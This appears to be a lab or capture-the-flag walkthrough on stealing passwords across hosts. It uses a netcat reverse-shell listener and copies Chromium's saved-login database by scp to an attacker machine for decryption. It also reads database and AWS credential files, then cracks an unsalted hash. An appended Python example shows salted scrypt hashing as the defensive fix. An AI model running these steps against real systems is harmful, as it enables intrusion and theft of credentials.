====== Find Garry's Password ======

==== Start Reverse Shell Listener ====

root@kali$ nc -l 8000

==== Enhance Shell ====

https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/#method-3-upgrading-from-netcat-with-magic

garry@desktop$ python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
echo $TERM
stty -a
stty raw -echo
fg
reset --> xterm

==== Enable ssh and exfiltrate ====

garry@desktop$ ssh-keygen --> copy/paste id_rsa.pub -> root@kali
scp .config/chromium/Default/Login\ Data root@10.5.4.3:/tmp

==== Get Chrome Password ====

root@kali$ apt-get install python3-pip
sudo pip install pycrypto
apt-get install sqlite3
cd /tmp
#sqlite3 Login\ Data 'select username_value, password_value from logins;'
./get_chrome_pass.py
Decrypting the string: b'v...'
b...e

==== ssh to intern Server ====

garry@desktop$ ssh 192.168.6.105

====== Find Bob's Password ======

garry@server-intern$ python -c 'import pty; pty.spawn("/bin/bash")'

cat /var/www/app/.env
MYSQL_ROOT_PASSWORD=t..r
MYSQL_USER=d..r
MYSQL_PASSWORD=xxx
MYSQL_DATABASE=xxx

cat /var/www/app/www/conf.php
  'localhost',
  'user'=>getenv('MYSQL_USER'),
  'password'=>getenv('MYSQL_PASSWORD'),
  'dbname'=>'intern',
  'port'=>3306,
  'charset'=>'utf8'
];
?>

cat /var/www/app/www/login.php
// Prepare a select statement
$sql = "SELECT id, username, password FROM users WHERE username = ?";

mysql -h 192.168.6.105 -u root -p intern -> t..r
mysql> select * from users;
+----+----------+----------------------------------+---------------------+
| id | username | password                         | created_at          |
+----+----------+----------------------------------+---------------------+
|  1 | bob      | xxx                              | 2021-06-26 10:35:43 |
|  2 | garry    | xxx                              | 2021-06-26 10:35:43 |
+----+----------+----------------------------------+---------------------+
google for hash --> b..7

====== Find AWS Keys ======

garry@server-intern$ ssh bob@192.168.6.22
cat /home/bob/.aws/credentials
[default]
aws_access_key_id = xxx
aws_secret_access_key = xxx
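The "Find Bob's Password" step works because the users table stores a bare digest that a web search can resolve. The fix on the application side is a per-user random salt and a slow hash, so identical passwords produce different stored values and no public lookup table applies. The following is an added example (not code from the lab or from the app on this page); it uses Python's standard-library hashlib.scrypt, the storage format "scrypt$<salt>$<digest>" and the cost parameters are assumptions chosen for the example, and the sample digest in the checker is a constructed value.

```python
import hashlib
import hmac
import os
from typing import Optional

# scrypt cost parameters: assumed values for this example, tune for your hardware
SCRYPT_N = 2 ** 14
SCRYPT_R = 8
SCRYPT_P = 1
SALT_BYTES = 16
HEX_DIGITS = set("0123456789abcdef")


def _scrypt(password: str, salt: bytes) -> bytes:
    return hashlib.scrypt(password.encode("utf-8"), salt=salt,
                          n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=32)


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Return 'scrypt$<salt-hex>$<digest-hex>' (an assumed storage format).

    A fresh random salt per call means two users with the same password get
    different stored values, so the digest cannot be looked up in a public table.
    """
    if salt is None:
        salt = os.urandom(SALT_BYTES)
    return f"scrypt${salt.hex()}${_scrypt(password, salt).hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute the digest with the stored salt and compare in constant time."""
    parts = stored.split("$")
    if len(parts) != 3 or parts[0] != "scrypt":
        return False
    try:
        salt = bytes.fromhex(parts[1])
        expected = bytes.fromhex(parts[2])
    except ValueError:
        return False
    return hmac.compare_digest(_scrypt(password, salt), expected)


def is_lookup_vulnerable(stored: str) -> bool:
    """Flag a stored value that is a bare, unsalted 32-hex-char digest, the
    shape of the password column on this page, which a search engine can often
    resolve. Anything in the salted 'scrypt$...' format is not flagged."""
    s = stored.lower()
    return len(s) == 32 and set(s) <= HEX_DIGITS


if __name__ == "__main__":
    # Constructed sample rows in the style of the users table above.
    legacy_row = {"username": "bob", "password": "0123456789abcdef0123456789abcdef"}
    migrated_row = {"username": "garry", "password": hash_password("example-pass")}
    for row in (legacy_row, migrated_row):
        state = "LOOKUP-VULNERABLE" if is_lookup_vulnerable(row["password"]) else "salted"
        print(f"{row['username']}: {state}")
    print("login ok:", verify_password("example-pass", migrated_row["password"]))
```

Migrating an existing table means re-hashing each password at the user's next successful login, since the original plaintext is not available to the server; until then is_lookup_vulnerable can drive a report of which rows are still in the old format.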